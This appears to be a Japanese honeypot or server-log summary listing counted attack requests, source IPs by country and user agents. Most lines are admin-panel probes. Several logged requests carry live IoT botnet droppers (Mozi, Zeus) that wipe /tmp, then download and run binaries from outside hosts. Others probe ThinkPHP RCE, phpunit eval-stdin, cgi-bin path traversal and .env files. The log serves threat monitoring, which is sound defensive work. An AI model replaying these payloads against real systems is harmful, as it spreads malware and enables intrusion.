1 GET /phpMyAdmin-2.6.1-rc2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.2-beta1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.2-pl1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.2-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.3-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.3-rc1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.3/ HTTP/1.1
1 GET /phpMyAdmin-2.6.4-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.4-pl2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.4-pl3/ HTTP/1.1
1 GET /phpMyAdmin-2.6.4-pl4/ HTTP/1.1
1 GET /phpMyAdmin-2.6.4-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.4/ HTTP/1.1
1 GET /phpMyAdmin-2.7.0-beta1/ HTTP/1.1
1 GET /phpMyAdmin-2.7.0-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.7.0-pl2/ HTTP/1.1
1 GET /phpMyAdmin-2.7.0-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.7.0/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0-beta1/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0-rc2/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0.1/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0.2/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0.3/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0.4/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0/ HTTP/1.1
1 GET /phpMyAdmin-2.8.1-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.8.1/ HTTP/1.1
1 GET /phpMyAdmin-2.8.2/ HTTP/1.1
1 GET /phpMyAdmin-2/ HTTP/1.1
1 GET /phpMyAdmin-5.1.0-english/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/ HTTP/1.1
1 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin2/ HTTP/1.1
1 GET /phpmanager/ HTTP/1.1
1 GET /phpmy-admin/ HTTP/1.1
1 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin2/ HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/ HTTP/1.1
1 GET /pma2005/ HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /script HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.172.157.131/bins/Zeus.arm;chmod+777+/tmp/Zeus.arm;sh+/tmp/Zeus.arm
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//123[.]14[.]248[.]57:53465/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sql/myadmin/index.php?lang=en HTTP/1.1
1 GET /sqlite/main.php HTTP/1.1
1 GET /sqlitemanager/main.php HTTP/1.1
1 GET /sqlmanager/ HTTP/1.1
1 GET /sqlweb/ HTTP/1.1
1 GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1
1 GET /webadmin/ HTTP/1.1
1 GET /webdb/ HTTP/1.1
1 GET /websql/ HTTP/1.1
1 GET http[:]//132[.]145[.]66[.]34:80/MyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/PHPMYADMIN/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.1/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.1-rc1/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.10.1/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpmy/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpmyadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpmyadmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/sql/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/sqladmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/ysqladmin/scripts/setup.php HTTP/1.0
1 GET http[:]//www[.]msftncsi[.]com/ncsi.txt HTTP/1.1
1 HEAD / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
3 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.121.10 Romania
1 20.55.53.144 United States
3 23.95.100.141 United States
1 27.47.42.187 China
1 45.33.102.90 United States
1 45.87.61.162 United States
10 45.146.165.37 Russia
1 52.226.197.29 United States
1 59.94.135.31 India
1 60.162.182.150 China
1 75.119.145.87 Germany
3 89.248.165.52 United Kingdom
5 95.181.161.112 Russia
1 109.237.103.9 Russia
1 109.237.103.123 Russia
1 125.46.182.25 China
1 125.119.47.65 China
1 132.145.39.16 United States
2 157.230.216.203 United States
1 159.223.139.250 United States
1 162.142.125.211 United States
1 172.104.138.223 United States
1 172.105.89.161 United States
1 180.188.243.99 India
6 185.254.196.223 Ukraine
1 188.153.229.155 Italy
101 190.97.236.150 Venezuela
1 192.3.221.154 United States
1 192.241.217.78 United States
1 192.241.218.140 United States
1 192.241.222.4 United States
21 209.141.62.127 United States

UserAgent一覧

件数 UserAgent
42 -
1 Hello, World
1 Hello, world
1 IDBTE4M CODE87
1 Java/1.8.0_321
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
11 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 zgrab/0.x
1 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 MGLNDD_13.67.44.234
1 \x16\x03\x01\x02
1 \x16\x03\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 CONNECT pulpo[.]es:443 HTTP/1.1
12 GET /.env HTTP/1.1
1 GET //MyAdmin/scripts/setup.php HTTP/1.1
1 GET //phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET //phpmyadmin/scripts/setup.php HTTP/1.1
1 GET //pma/scripts/setup.php HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /fuN3 HTTP/1.0
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /muieblackcat HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ http[:]//2[.]56[.]57[.]7/.s4y/arm;sh+/tmp/arm
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//125[.]119[.]47[.]65:36075/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET http[:]//13[.]67[.]44[.]234:80/MyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/PHPMYADMIN/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.10.1/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.1-rc1/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.10.1/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyAdmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpMyadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpmy/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpmyadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/phpmyadmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/sql/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/sqladmin/scripts/setup.php HTTP/1.0
1 GET http[:]//13[.]67[.]44[.]234:80/ysqladmin/scripts/setup.php HTTP/1.0
1 HEAD / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0